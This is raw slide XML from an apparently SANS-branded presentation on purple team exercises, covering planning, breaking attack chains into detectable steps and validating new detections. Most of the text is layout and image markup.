              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A1493"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Purple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Planning Template </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Unit testing -&gt; Scenario testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does not require entire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can run the exercise in different ways. Ex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Time block dedicated to the exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run as available over the course of a week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good notetaking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Follow-up on outcomes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55D905B-BE83-FE42-B830-7811A0A9B1B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able&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4933E5-479B-E144-BBA7-CEBD5E470367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7028544" y="807777"/>
            <a:ext cx="5163456" cy="6050223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299993360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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="100151"/>
            <a:ext cx="10515600" cy="759340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410603" y="963560"/>
            <a:ext cx="6494372" cy="5184889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can also cover cloud and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IdaaS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use specific test cases and record results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break attack chains up into detectable components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Initial Access Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Okta token compromise via EvilGinx2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud credentials stolen from compromised laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visibility and detection gaps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gain visibility and write new detections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validate new detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55D905B-BE83-FE42-B830-7811A0A9B1B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AC15F22-38A2-A14B-8B6B-F54BF28C5F6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50397" y="704334"/>
            <a:ext cx="4765266" cy="6153665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390226873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3159-544C-3D48-8911-04589ED6F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1462217" y="2073833"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outside-In Attack Paths &amp; Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D5D484A-0052-7E4A-BAD9-E377BB3792A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937"/>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11098786" y="6252519"/>
            <a:ext cx="994359" cy="50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739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3D0C55"/>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FF83C4EF-0E9D-7F4A-95D5-6B27C2A0046F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8233455" y="1256904"/>
            <a:ext cx="3858812" cy="5459480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BDDD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468096" y="207669"/>
            <a:ext cx="9291215" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ft view</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EDEE940-FC11-B14F-BF7B-436164F95950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134541" y="1256904"/>
            <a:ext cx="4217162" cy="549155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6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE427895-B7AC-7A4D-BCB5-8D9E9658F1D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="297270" y="5328791"/>
            <a:ext cx="997621" cy="589668"/>
            <a:chOff x="7341704" y="1510854"/>
            <a:chExt cx="1749286" cy="1179336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBEEFC1-4794-FE44-ACA7-53A4644D1002}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7447722" y="1510854"/>
              <a:ext cx="1524000" cy="821529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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rapezoid 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D387AA95-32BB-DF47-8A56-082BC7D641DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7341704" y="2332383"/>
              <a:ext cx="1749286" cy="357807"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">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picture containing object, light, lamp&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1447435-2EE8-9F4F-B231-645D5C68A26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68422" y="1680318"/>
              <a:ext cx="482600" cy="482600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Group 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772CB0BA-B883-1E47-9B58-8267F88E07A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2735564" y="5338511"/>
            <a:ext cx="997621" cy="589668"/>
            <a:chOff x="7341704" y="1510854"/>
            <a:chExt cx="1749286" cy="1179336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Rectangle 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{395C3652-0F88-B546-AF54-F8BB4254E6C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7447722" y="1510854"/>
              <a:ext cx="1524000" cy="821529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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rapezoid 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBE78E9-2C8F-0643-80F7-11A7F210F9AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7341704" y="2332383"/>
              <a:ext cx="1749286" cy="357807"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">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8E072E05-CD70-1648-A037-A942BA4541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54276" y="5410772"/>
            <a:ext cx="380274" cy="297248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 52" descr="A picture containing plate, table, white, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F2BEDBD-BA70-5E4A-89EB-1ECFA22DB66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6825" y="1995257"/>
            <a:ext cx="560089" cy="560089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E241CBCF-6B01-614B-A18A-2CB35AEC1D7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98960" y="1741181"/>
            <a:ext cx="678243" cy="678243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 53" descr="A picture containing drawing&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC10B555-4B0F-CC42-A080-4BF58DCAD7C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89059" y="4016385"/>
            <a:ext cx="881179" cy="460487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F72C1363-2DC7-2C47-9380-8597640B0B7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63336" y="2700474"/>
            <a:ext cx="478445" cy="489809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE5E56E-E2F0-A248-B3FA-5A8D99DBA43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894884" y="2831114"/>
            <a:ext cx="862287" cy="603601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0804B1CC-65B4-614B-A5A1-D1BA86D948B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37352" y="2945378"/>
            <a:ext cx="732069" cy="383116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rounded Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499BEBD1-4DB2-9849-9DA8-FFD44A51F67E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708980" y="1898137"/>
            <a:ext cx="865173" cy="43198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 Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="Group 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04F608F1-8892-1B4F-A554-F37D15A4B63B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1576532" y="6009526"/>
            <a:ext cx="997621" cy="589668"/>
            <a:chOff x="7341704" y="1510854"/>
            <a:chExt cx="1749286" cy="1179336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23CAFC2-370C-9247-B8BB-AED4DEA9EE55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7447722" y="1510854"/>
              <a:ext cx="1524000" cy="821529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln>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rapezoid 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592E0CC4-88E1-6948-870C-729AB6ABF9FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7341704" y="2332383"/>
              <a:ext cx="1749286" cy="357807"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">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0" name="Picture 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D53CF37-9980-8146-A76D-9F957800775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970238" y="6112023"/>
            <a:ext cx="236406" cy="242021"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2D9F24-A96C-1940-AFFA-6F2C87BB05D3}"/>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296673" y="1947230"/>
            <a:ext cx="822486" cy="519811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61948607-B406-AD47-B83C-12C0E2543352}"/>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456274" y="3111802"/>
            <a:ext cx="599178" cy="599178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990955ED-1983-E044-90CB-C47C2A3FD750}"/>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375925" y="2858940"/>
            <a:ext cx="1069892" cy="1066736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{209EC4B3-45EF-FE46-AE6F-A1255866134C}"/>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101099" y="2626492"/>
            <a:ext cx="454109" cy="464895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A76F4222-B581-574A-98CE-4F3F0C59BA30}"/>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484084" y="2472772"/>
            <a:ext cx="709006" cy="372228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Picture 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F29AD969-1E92-A640-971B-8BA87DF6FCF7}"/>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0234381" y="3153251"/>
            <a:ext cx="885515" cy="464895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E596641-A444-A74B-A786-DD5126A080E9}"/>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515999" y="3986644"/>
            <a:ext cx="800099" cy="776096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Picture 78">
            <a:extLst>
